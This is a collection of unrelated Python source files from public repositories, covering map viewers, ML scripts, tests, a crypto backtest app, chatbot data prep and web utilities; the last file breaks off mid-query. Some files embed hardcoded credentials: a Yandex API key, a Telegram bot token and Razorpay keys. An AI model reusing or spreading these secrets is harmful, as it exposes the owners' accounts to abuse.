pygame.Color(\"white\")\r\ngib_button.font_color = pygame.Color(\"white\")\r\nindex_button.font_color = pygame.Color(\"white\")\r\nclear_button.font_color = pygame.Color(\"white\")\r\nwhile running:\r\n prevcoords = coords.copy()\r\n for e in pygame.event.get():\r\n gui.get_event(e)\r\n if sat_button.pressed and type != \"sat\":\r\n type = \"sat\"\r\n image = get_image(zom,coords,type,point)\r\n if gib_button.pressed and type != \"sat,skl\":\r\n type = \"sat,skl\"\r\n image = get_image(zom,coords,type,point)\r\n if map_button.pressed and type != \"map\":\r\n type = \"map\"\r\n image = get_image(zom,coords,type, point)\r\n if (clear_button.pressed or (findbox.executed and findbox.text == \"\")) and point:\r\n point = \"\"\r\n findbox.executed = False\r\n image = get_image(zom, coords, type, point)\r\n stat.text = \"\"\r\n if index_button.pressed:\r\n if index:\r\n index_button.text =\"индекс\"\r\n stat.text = text\r\n else:\r\n index_button.text =\"нет\"\r\n stat.text = text + \" | \" + iindex\r\n index= not index\r\n if (find_button.pressed or findbox.executed) and wasfinded != findbox.text and findbox.text:\r\n findbox.executed = False\r\n req = get_json_request(findbox.text)\r\n if req != \"B\" and req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"]:\r\n try:\r\n iindex = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"Address\"][\"postal_code\"]\r\n except Exception: iindex = \"Unable to find\"\r\n coordsOf = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"Point\"][\"pos\"].split(\" \")\r\n point = \",\".join(coordsOf)+\",pm2gnl\"\r\n coords = coordsOf.copy()\r\n image = get_image(zom,coords,type,point)\r\n text = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"text\"]\r\n stat.text = text\r\n if index: stat.text +=\" | \" + iindex\r\n else:\r\n stat.text = \"Unable to find\"\r\n\r\n if e.type == pygame.MOUSEBUTTONDOWN and not findbox.active and all([not clear_button.pressed, not find_button.pressed,\r\n not gib_button.pressed,\r\n not index_button.pressed,\r\n not map_button.pressed,\r\n not sat_button.pressed]):\r\n x = str(float(coords[0]) + (walkx * ((e.pos[0] - 300) / 600)) / (2 ** (zom - 1)))\r\n y = str(float(coords[1]) + (-walky * ((e.pos[1] - 225) / 450)) / (2 ** (zom - 1)))\r\n if e.button == 1:\r\n req = get_json_request(\",\".join([x, y]))\r\n if req !=\"B\" and req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"]:\r\n 
text = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"text\"]\r\n stat.text = text\r\n try:\r\n iindex = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"Address\"][\"postal_code\"]\r\n except Exception: iindex = \"Unable to find\"\r\n point = \",\".join([x,y]) + \",pm2gnl\"\r\n try:\r\n image = get_image(zom, coords, type, point)\r\n except Exception: pass\r\n elif e.button == 3:\r\n try:\r\n if findbox.text == \"\": findbox.text = \"аптека\"\r\n req = requests.get(\"https://search-maps.yandex.ru/v1/?ll=\"+\",\".join([x, y])+\"&ll=\"+\",\".join(coords)+\"&spn=0.000045,0.000045&lang=ru_RU&results=1&apikey=3c4a592e-c4c0-4949-85d1-97291c87825c\").json()\r\n print(req)\r\n if req[\"features\"]:\r\n index = \"Unable to find\"\r\n text = req[\"features\"][0][\"properties\"][\"CompanyMetaData\"][\"name\"]\r\n point = \",\".join(map(lambda x: str(x), req[\"features\"][0][\"geometry\"][\"coordinates\"])) + \",pm2orl\"\r\n stat.text = text\r\n image = get_image(zom, coords, type, point)\r\n except Exception: pass\r\n\r\n if e.type == pygame.QUIT: running = False\r\n if e.type == pygame.KEYDOWN:\r\n if e.key == pygame.K_PAGEUP and float(zom) limit[0]:\r\n zom = zom-1\r\n image = get_image(zom,coords,type, point)\r\n if e.key == pygame.K_UP:\r\n coords[1] = str(float(coords[1])+walky/(2**(zom-1)))\r\n try:\r\n image = get_image(zom,coords,type, point)\r\n except: coords = prevcoords\r\n if e.key == pygame.K_DOWN:\r\n coords[1] = str(float(coords[1])-walky/ (2 ** (zom - 1)))\r\n try:\r\n image = get_image(zom,coords,type, point)\r\n except:\r\n coords = prevcoords\r\n if e.key == pygame.K_LEFT:\r\n coords[0] = str(float(coords[0]) - walkx/ (2 ** (zom - 1)))\r\n try:\r\n image = get_image(zom, coords,type, point)\r\n except:\r\n coords = prevcoords\r\n if e.key == pygame.K_RIGHT:\r\n coords[0] = str(float(coords[0]) + walkx/ (2 ** (zom - 1)))\r\n try:\r\n image = get_image(zom, coords,type, point)\r\n except:\r\n coords = prevcoords\r\n screen.blit(image, (0, 0))\r\n gui.render(screen)\r\n pygame.display.flip()\r\n pass\r\npygame.quit()\r\n\r\n# Удаляем за собой файл с изображением.","repo_name":"Kukushenok/YandexMapProgramm","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":9522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7538712940","text":"import os\r\nimport shutil\r\nimport subprocess\r\nimport requests\r\nimport sys\r\nimport time\r\n\r\nfrom utils.banners.banner_messages import *\r\nfrom utils.banners.print_banner import print_banner\r\nfrom utils.checks.check_termux import check_termux\r\nfrom utils.managers.updater_manager import Updater\r\n\r\n\r\ndef update_mcptool():\r\n \"\"\" Check for updates and if necessary, update it. 
\"\"\"\r\n\r\n u = Updater()\r\n new_script = False\r\n update_banner_name = 'update' if not check_termux() else 'update_termux'\r\n\r\n # Messages\r\n try:\r\n print_banner(update_banner_name, update_title, update_checking_updates, '', '', '', '')\r\n time.sleep(1)\r\n update = u.check_mcptool_updates()\r\n\r\n if update:\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, '', '', '')\r\n time.sleep(1)\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, '', '')\r\n time.sleep(1)\r\n\r\n if u.download('MCPTool.zip', 'https://github.com/wrrulos/MCPTool/releases/latest/download/MCPTool.zip', '../New-MCPTool'):\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_extracting, '')\r\n time.sleep(1)\r\n\r\n if u.extracting('../New-MCPTool/MCPTool.zip', '../New-MCPTool/'):\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_extracting, update_finished)\r\n time.sleep(1)\r\n shutil.copytree('../New-MCPTool/MCPTool-main', '../NewMCPTool')\r\n shutil.rmtree('../New-MCPTool')\r\n\r\n if os.path.exists('ngrok'):\r\n shutil.copy('ngrok', f'../NewMCPTool/ngrok')\r\n\r\n if os.path.exists('ngrok.exe'):\r\n shutil.copy('ngrok.exe', f'../NewMCPTool/ngrok.exe')\r\n \r\n new_script = True\r\n subprocess.run(f'cd ../NewMCPTool/ && {sys.executable} main.py', shell=True)\r\n sys.exit()\r\n\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_extracting, update_error)\r\n time.sleep(2.5)\r\n return\r\n\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_error, '')\r\n time.sleep(2.5)\r\n return\r\n\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_not_found, '', '', '')\r\n time.sleep(2.5)\r\n return\r\n \r\n except requests.exceptions.InvalidURL:\r\n return\r\n \r\n except FileExistsError:\r\n return\r\n\r\n except KeyboardInterrupt:\r\n if new_script:\r\n sys.exit()\r\n\r\n return\r\n","repo_name":"wrrulos/MCPTool","sub_path":"utils/updates/mcptool_update.py","file_name":"mcptool_update.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"54"} +{"seq_id":"10272974202","text":"from configparser import ConfigParser\n\nconfig_parser = ConfigParser()\nconfig_parser.read('general_config.ini')\n\nPROJECT_NAME = config_parser.get('project', 'project_name')\nNUMBER_OF_SLICES = config_parser.getint('project', 'number_of_slices')\n\nconfig_parser.read('projects/' + PROJECT_NAME + \"/\" + PROJECT_NAME + \"_config.ini\")\n\nONNX_MODEL = config_parser.get('project', 'onnx_model')\nS3_BUCKET = config_parser.get('aws', 's3_bucket')\nPREPROCESSED_INPUT = config_parser.get('input', 'preprocessed_input')\n\nparsed_input_list = config_parser.get('project', 'input_list_start')\nINPUT_LIST_START = list(parsed_input_list.split(\"\\n\"))[1:]\n\nparsed_output_list = config_parser.get('project', 'output_list_end')\nOUTPUT_LIST_END = list(parsed_output_list.split(\"\\n\"))[1:]\n\nPROJECT_STEPS_MODULE = \"projects.\" + PROJECT_NAME + \".\" + PROJECT_NAME + 
\"_lambda_steps\"\n","repo_name":"adrien-glg/onnx-decomposer_aws","sub_path":"lambda_code/src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1584422088","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.metrics import mean_squared_error\n\n\ndef predictor(data):\n heera = pd.read_csv('diamonds.csv')\n heera['cut'].replace(['Ideal', 'Premium', 'Good', 'Very Good', 'Fair'], [0,1,2,3,4], inplace=True)\n heera['clarity'].replace(['IF', 'VVS1', 'VVS2', 'VS1', 'VS2', 'SI1', 'SI2', 'I1'], [0,1,2,3,4,5,6,7], inplace=True)\n heera['color'].replace(['D', 'E', 'F', 'G', 'H', 'I', 'J'], [0,1,2,3,4,5,6], inplace=True)\n # heera.drop(['Unnamed: 0.1','Unnamed: 0.1'], axis=1,inplace=True)\n X = heera[['x','y','z','carat','color','clarity','depth','table']].values\n y = heera[\"price\"].values\n X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.4,random_state=0)\n knn = KNeighborsRegressor(n_neighbors = 2)\n knn.fit(X_train,y_train)\n prediction = knn.predict(data)[0]\n return prediction","repo_name":"Mindlord-rex/diamond_deploy","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14047940035","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport subprocess\nfrom util.io.iter_raw_paths import iter_raw_paths\nfrom mne_bids import BIDSPath\n\ndef main(subs, skips) -> None:\n RAW_DIR = '../data/raw/' # where our data currently lives\n BIDS_DIR = '../data/bids/' # where we want it to live\n BAD_SUBS = ['1', '20']\n \n for (fpath, sub, task, run) in iter_raw_paths(RAW_DIR):\n\n # skip bad subjects\n if sub in BAD_SUBS:\n print(f'Bad subject {sub}, skipping')\n continue\n\n # skip if subs were listed and this sub is not included\n if bool(subs) and sub not in subs:\n continue\n\n # skip sub in skips\n if sub in skips:\n continue\n\n # skips files that already exist\n bids_path = BIDSPath(\n run = run,\n subject = sub,\n task = task,\n datatype = 'eeg',\n root = BIDS_DIR\n )\n if os.path.isfile(bids_path) and force == False:\n print(f'File {bids_path} exists, skipping {fpath}')\n continue\n \n #print(\"subprocess.check_call(\\\"sbatch ./convert_to_bids.py %s %s %s %s\\\" % (fpath, sub, task, run), shell=True)\")\n subprocess.check_call(\"sbatch ./convert_to_bids.py %s %s %s %s\" % (fpath, sub, task, run), shell=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run convert_to_bids.py over given subjects')\n parser.add_argument('--force',\n type = bool,\n nargs = 1,\n help = 'If true run script even if save_fpath exists.',\n default = False)\n parser.add_argument('--subs',\n type = str,\n nargs = '*',\n help = 'subjects to convert (e.g. 3 14 8), provide no argument to run over all subjects',\n default = [])\n parser.add_argument('--skips',\n type = str,\n nargs = '*',\n help = 'subjects NOT to convert (e.g. 
1 9)',\n default = [])\n args = parser.parse_args()\n force = args.force\n subs = args.subs\n skips = args.skips\n print(f\"subs: {subs}, skips : {skips}\")\n if bool(subs) & bool(skips):\n raise ValueError('Cannot specify both subs and skips')\n main(subs, skips)\n","repo_name":"letitiayhho/dichotic_pitch_tracking","sub_path":"analysis/convert_all_subjects_to_bids.py","file_name":"convert_all_subjects_to_bids.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29393518478","text":"# -*- coding: utf-8 -*-\n\nimport operator\nfrom com.qa.automation.appium.api.api_new import API\nfrom com.qa.automation.appium.pages.android.common.super_page import SuperPage\nfrom com.qa.automation.appium.pages.android.ffan.square_lefu_pay_page_configs import SquareLefuPayPageConfigs as SLPPC\n\n\nclass SquareLefuPayPage(SuperPage):\n '''\n 作者 刘涛\n 首页=>乐付\n '''\n def __init__(self, testcase, driver, logger):\n super(SquareLefuPayPage, self).__init__(testcase, driver, logger)\n\n def validSelf(self):\n '''\n usage : 验证乐付买单\n '''\n API().assertElementByResourceId(self.testcase, self.driver, self.logger,\n SLPPC.resource_id_lefu_pay_title,\n 18)\n elementList = API().getElementsByContainsText(self.testcase,\n self.driver,\n self.logger,\n SLPPC.view_text_distance,\n 10)\n \n plaza_number = len(elementList)\n if plaza_number > 1:\n for i in range(1, plaza_number):\n current_plaza_distance = elementList[i].text.split(\" \")[0]\n prev_plaza_distance = elementList[i-1].text.split(\" \")[0]\n if operator.gt(prev_plaza_distance, current_plaza_distance):\n API().assertTrue(self.testcase, self.logger, False)\n\n def clickOnLefuPay(self):\n '''\n usage : 点击 \"乐付买单\"\n '''\n API().clickElementByResourceId(self.testcase, self.driver, self.logger,\n SLPPC.resource_id_lefu_pay,\n 18)\n","repo_name":"liu111xiao111/UItest","sub_path":"AutoFrameworkForAppiumPy/com/qa/automation/appium/pages/android/ffan/square_lefu_pay_page.py","file_name":"square_lefu_pay_page.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"43451799983","text":"\"\"\"\nURL configuration for library_management project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\n'''\nModule 18 - Library Management Project Assignment.\nMod date : 180623\nMod begin date : 050723, Wednesday, 07.00 am\nassignment being date : 160723, Sunday, 06.00 am \nassignment done date : 190723, Wednesday, 10.00 pm \n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n'''\nmost of the templats are in the templates/lib_users and templates/library_services \n\ntemplates/lib_users has all the templates of wishlist ans books app. 
\n'''\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('core.urls')),\n path('auth/', include('lib_users.urls')),\n path('services/', include('library_services.urls')),\n path('wishlist/', include('wishlist.urls')),\n path('books/', include('books.urls')),\n path('wallet/', include('wallet.urls')),\n \n]\n","repo_name":"Mahboob-A/library-management-system-fresh","sub_path":"library_management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9862402127","text":"# Given a (m * n) matrix grid which is sorted in non-increasing order both row-wise and column-wise, return the number of negative numbers in grid.\n\n# Example : Input : [[4,3,2,-1],[3,2,1,-1],[1,1,-1,-2],[-1,-1,-2,-3]]\n# : Output: 8\n# Another example : Input : [[3,2],[1,0]]\n# : Output: 0\n\n\nclass Solution:\n \n def binary_search(self, row: list[int]) -> int:\n length = len(row)\n start, end = 0, length-1\n while start <= end:\n mid = (start+end) // 2\n if row[mid] < 0:\n if mid-1 >= 0 and row[mid-1] < 0:\n end = mid-1\n else:\n return length-mid\n else:\n start = mid+1\n return 0\n \n def countNegatives(self, matrix: list[list[int]]) -> int:\n count = 0\n for row in matrix:\n if row[-1] < 0:\n count += self.binary_search(row)\n return count\n\n","repo_name":"maamoun3911/Problem-Solving-Repo","sub_path":"LeetCode/problem#1351.py","file_name":"problem#1351.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10565616617","text":"import yfinance as yf\r\nimport pandas as pd\r\nimport streamlit as st\r\n\r\nlogo_image = \"logo.png\"\r\nst.sidebar.image(logo_image, width=170)\r\nst.sidebar.title(\"DCA vs LumpSump Estrategies\")\r\n\r\n# Seleccionamos las cryptos\r\ntickers = ['BTC-USD', 'ETH-USD', 'BNB-USD', 'ADA-USD', 'XRP-USD',\r\n 'SOL-USD', 'DOT-USD', 'DOGE-USD', 'AVAX-USD', 'LUNA-USD',\r\n 'UNI-USD', 'LINK-USD', 'MATIC-USD', 'LTC-USD', 'BCH-USD',\r\n 'ALGO-USD', 'ATOM-USD', 'XTZ-USD', 'FIL-USD', 'TRX-USD',\r\n 'VET-USD', 'EOS-USD', 'AAVE-USD', 'XLM-USD', 'CRO-USD',\r\n 'FTT-USD', 'MIOTA-USD', 'MKR-USD', 'XEM-USD', 'DASH-USD',\r\n 'NEO-USD', 'BTT-USD', 'XTZ-USD', 'AAVE-USD',\r\n '1INCH-USD', 'ALICE-USD', 'FARM-USD', 'GALA-USD', 'POWR-USD'] # Agrega más según sea necesario\r\n\r\n# Desarrollamos los inputs de Streamlit\r\ndropdown = st.sidebar.selectbox(\"Choose a crypto:\", tickers)\r\nstart = st.sidebar.date_input(\"Start date:\", value=pd.to_datetime(\"2021-10-31\"))\r\ninvestment = st.sidebar.number_input(\"Choose investment per month:\")\r\n\r\n# Creamos una función para obtener datos históricos\r\ndef get_data(symbol, start):\r\n data = yf.download(symbol, start=start)\r\n return data\r\n\r\n# Creamos el dataframe\r\ndf = get_data(dropdown, start)\r\n\r\n# Verificamos si el DataFrame está vacío\r\nif df.empty:\r\n st.error(\"Data not available. 
Please check the selected crypto symbol and start date.\")\r\nelse:\r\n st.success(\"Data downloaded successfully.\")\r\n\r\n# Creación de fechas de compra y precios de compra\r\nbuydates = pd.date_range(df.index[0], df.index[-1], freq=\"1M\")\r\nbuyprices = df[df.index.isin(buydates)].Close\r\n\r\n# Calculo de la cantidad de criptomonedas compradas\r\ncoin_amt = investment / buyprices\r\ncoin_amt_LS = investment * len(buyprices) / buyprices[0]\r\n\r\n# Calculo del portafolio en la estrategia DCA\r\ncoin_amt_sum = coin_amt.cumsum()\r\ncoin_amt_sum.name = \"coin_amt_DCA\"\r\ndf_tog = pd.concat([coin_amt_sum, df], axis=1).ffill()\r\ndf_tog[\"Portfolio_DCA\"] = df_tog.coin_amt_DCA * df_tog.Close\r\n\r\n# Calculo del rendimiento de la estrategia DCA\r\nperformance_DCA = (df_tog[\"Portfolio_DCA\"][-1] / (investment * len(buyprices)) - 1)\r\n\r\n# Calculo del portafolio en la estrategia LS\r\ndf_tog[\"coin_amt_LS\"] = coin_amt_LS\r\ndf_tog[\"Portfolio_LS\"] = df_tog.coin_amt_LS * df_tog.Close\r\n\r\n# Calculo del rendimiento en la estrategia LS\r\nperformance_LS = (df_tog[\"Portfolio_LS\"][-1] / (investment * len(buyprices)) - 1)\r\n\r\n# Display de gráficos y performance\r\nst.subheader(\"DCA performance: \" + str(round(performance_DCA * 100, 2)) + \" %\")\r\nst.line_chart(df_tog[\"Portfolio_DCA\"])\r\nst.subheader(\"LS performance: \" + str(round(performance_LS * 100, 2)) + \" %\")\r\nst.line_chart(df_tog[\"Portfolio_LS\"])","repo_name":"warthon-190399/crypto","sub_path":"hola.py","file_name":"hola.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23388418842","text":"from parameters import Args\nimport torch\nimport pickle\nimport os\nimport logging\nfrom torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler\nfrom transformers import (\n MODEL_WITH_LM_HEAD_MAPPING,\n WEIGHTS_NAME,\n AdamW,\n AutoConfig,\n AutoModelWithLMHead,\n AutoTokenizer,\n PreTrainedModel,\n PreTrainedTokenizer,\n get_linear_schedule_with_warmup,\n)\nlogger = logging.getLogger(__name__)\nMODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys())\nMODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)\nargs = Args()\n\n\"\"\"Let's get our data into a format that we can feed into our model using Pytorch's Dataset and Dataloader API.\nAll these methods do are convert our dataframes where we have multiple historical dialog,\ni.e., context, and a response, into a single conversation string that is separated a special token\nthat tells our model when a person is finished speaking.\n\nThese conversation strings are then tokenized using HuggingFace's awesome tokenizers into their numerical\nrepresentation that our model actual understands!\n\"\"\"\ndef construct_conv(row, tokenizer, eos = True):\n # from: https://stackoverflow.com/questions/952914/how-to-make-a-flat-list-out-of-list-of-lists\n flatten = lambda l: [item for sublist in l for item in sublist]\n conv = list(reversed([tokenizer.encode(x) + [tokenizer.eos_token_id] for x in row]))\n conv = flatten(conv)\n return conv\n\nclass ConversationDataset(Dataset):\n def __init__(self, tokenizer: PreTrainedTokenizer, args, df, block_size=512):\n\n block_size = block_size - (tokenizer.max_len - tokenizer.max_len_single_sentence)\n\n directory = args.cache_dir\n cached_features_file = os.path.join(\n directory, args.model_type + \"_cached_lm_\" + str(block_size)\n )\n\n if os.path.exists(cached_features_file) and not 
args.overwrite_cache:\n logger.info(\"Loading features from cached file %s\", cached_features_file)\n with open(cached_features_file, \"rb\") as handle:\n self.examples = pickle.load(handle)\n else:\n logger.info(\"Creating features from dataset file at %s\", directory)\n\n self.examples = []\n for _, row in df.iterrows():\n conv = construct_conv(row, tokenizer)\n if len(conv) > block_size: continue\n self.examples.append(conv)\n\n logger.info(\"Saving features into cached file %s\", cached_features_file)\n with open(cached_features_file, \"wb\") as handle:\n pickle.dump(self.examples, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, item):\n return torch.tensor(self.examples[item], dtype=torch.long)\n\ndef load_and_cache_examples(args, tokenizer, df_trn, df_val, evaluate=False):\n return ConversationDataset(tokenizer, args, df_val if evaluate else df_trn)\n","repo_name":"christinaknudsen/chatbot_research","sub_path":"norwegian_dialoGPT/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18751953735","text":"def palindrome_checker(number):\n ### This function checks from 0 to the input number and prints out all the palindromes between it. a palindrome is anything that reads the same both backward and forward e.g. Tenet, 101. Example: palindrome_checker(12) -> 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11###\n\n counter = 0\n for num in range(number):\n if str(num)[::-1] == str(num):\n print(num)\n counter += 1\n\n return counter\n\n\nprint(palindrome_checker(500))\n","repo_name":"AjibolaMatthew1/ECX30-Days_of_code","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35693987990","text":"import telegram\nfrom .models import Order\n\ndef send_telegram_message(msg):\n token = '1476623880:AAGCjhLjuSzDBym_j1zgZKIpFkMlDDAdX7Q'\n chat_id = 1426070442\n bot = telegram.Bot(token=token)\n bot.sendMessage(chat_id=chat_id, text=msg)\n\ndef razorpay_gateway(amount):\n client = razorpay.Client(auth=(\"rzp_test_BzpuQZbbNkr9jv\",\"McdtiUVkfbSjBybiNhgR12pk\"))\n order = client.order.create(dict(amount=amount, currency='$'))\n return order[\"id\"]\n\ndef init_cookie(request):\n if not 'order_id' in request.COOKIES:\n new_order = Order.objects.create()\n return new_order.id\n else:\n return request.COOKIES['order_id']","repo_name":"JerubandiNandini/website","sub_path":"coolstyles/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42742562651","text":"from django_elasticsearch_dsl import Document, fields\nfrom django_elasticsearch_dsl.registries import registry\n\nfrom companies.models import Company\n\n\n@registry.register_document\nclass CompanyIndex(Document):\n class Index:\n name = 'company'\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n name = fields.TextField(\n attr='name',\n fields={\n 'suggest': fields.Completion(),\n }\n )\n get_absolute_url = fields.TextField(attr=\"get_absolute_url\")\n\n class Django:\n model = 
Company","repo_name":"cjmcfaul/servstry","sub_path":"contact_trace/documents/company_document.py","file_name":"company_document.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9124403380","text":"from typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def __str__(self):\n return str(self.val)\n\n def __repr__(self):\n return str(self.val)\n\n\ndef getAllElements(root1: TreeNode, root2: TreeNode) -> List[int]:\n # iterative\n # list1 = iterInorder(root1)\n # list2 = iterInorder(root2)\n\n # recursive\n list1 = list()\n list2 = list()\n recurInorder(root1, list1)\n recurInorder(root2, list2)\n result = list()\n i, j = 0, 0\n # merge two sorted lists\n while i < len(list1) and j < len(list2):\n if list1[i].val <= list2[j].val:\n result.append(list1[i].val)\n i+=1\n else:\n result.append(list2[j].val)\n j+=1\n for rem in list1[i:]:\n result.append(rem.val)\n for rem in list2[j:]:\n result.append(rem.val)\n return result\n\n# Very slow. ~4284ms for Leetcode submission test cases\n# Little bit less memory 17.1 MB for Leetcode submission test cases\ndef iterInorder(node: TreeNode):\n if node is None:\n return []\n stack = list()\n result = list()\n stack.append(node)\n while stack:\n print(\"Stack:\", stack)\n print(\"Result:\", result)\n # dig into left-most child\n while stack[-1].left is not None and stack[-1].left not in result:\n stack.append(stack[-1].left)\n # add left-most child to result\n nodeToAppend = stack.pop()\n result.append(nodeToAppend)\n if nodeToAppend.right is not None:\n stack.append(nodeToAppend.right)\n\n return result\n\n\n# Much much faster ~400ms for Leetcode submission test cases\n# Little bit more memory 20.3 MB for Leetcode submission test cases\ndef recurInorder(node: TreeNode, orderList):\n if node is None:\n return\n recurInorder(node.left, orderList)\n orderList.append(node)\n recurInorder(node.right, orderList)\n\n\n# driver\n# example 1\nroot1 = TreeNode(2, TreeNode(1), TreeNode(4))\nroot2 = TreeNode(1, TreeNode(0), TreeNode(3))\nprint(\"Input: root1 = [2,1,4], root2 = [1,0,3]\")\nprint(\"Output:\", getAllElements(root1, root2))\n\nroot1 = TreeNode(1, None, TreeNode(8))\nroot2 = TreeNode(8, TreeNode(1), None)\nprint(\"Input: root1 = [1,None,8], root2 = [8,1]\")\nprint(\"Output:\", getAllElements(root1, root2))\n\nroot1 = TreeNode(0, TreeNode(-10), TreeNode(10))\nroot2 = TreeNode(5, TreeNode(1, TreeNode(0), TreeNode(2)), TreeNode(7))\nprint(\"Input: root1 = [0, -10, 10], root2 = [5, 1, 7, 0, 2]\")\nprint(\"Output:\", getAllElements(root1, root2))","repo_name":"minhyeong-joe/leetcode-challenge","sub_path":"Tree/AllElementsInTwoBSTs/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39360350455","text":"import psycopg2\n\nconnection = psycopg2.connect(\n host=\"postgres\",\n port=\"5432\",\n dbname=\"zach\",\n user='user',\n password='password'\n)\n\n\ndef login(name):\n try:\n cursor = connection.cursor()\n postgreSQL_select_Query = '''SELECT * FROM users WHERE name=%s;'''\n cursor.execute(postgreSQL_select_Query, (name,))\n user_record = cursor.fetchall()\n if(len(user_record) == 0):\n cursor.close()\n cursor = connection.cursor()\n insert_user_query = '''INSERT INTO users (NAME) VALUES 
(%s) RETURNING id'''\n cursor.execute(insert_user_query, (name,))\n user_id = cursor.fetchone()[0]\n connection.commit()\n # Creating associated sentences\n default_sentences = [\n 'Hi I saw that your was delivered. How are you enjoying it so far?',\n 'Great can you describe how you love most about ?',\n 'I\\'m sorry to hear that, what do you dislike about ?'\n ]\n insert_sms_query = '''INSERT INTO sms (TYPE, TEXT, USER_ID) VALUES (%s, %s, %s)'''\n for i, sentence in enumerate(default_sentences):\n cursor.execute(insert_sms_query, (i, sentence, user_id))\n connection.commit()\n return user_id\n\n return user_record[0][0]\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef get_sentences(user_id):\n try:\n cursor = connection.cursor()\n select_Query = '''SELECT text FROM sms WHERE user_id=%s ORDER BY type'''\n cursor.execute(select_Query, (user_id,))\n sentences = cursor.fetchall()\n return sentences\n\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef put_sentences(sentence, user_id, type_num):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"UPDATE sms SET text = %s WHERE user_id = %s AND type = %s;\"\"\"\n cursor.execute(sql_update_query, (sentence,\n int(user_id), int(type_num)))\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef create_customer(number, positive, negative):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"INSERT INTO customers 